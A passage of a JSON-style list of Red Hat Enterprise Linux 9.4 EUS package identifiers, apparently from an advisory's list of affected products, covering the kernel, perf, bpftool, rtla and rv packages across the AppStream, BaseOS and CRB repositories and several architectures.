"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
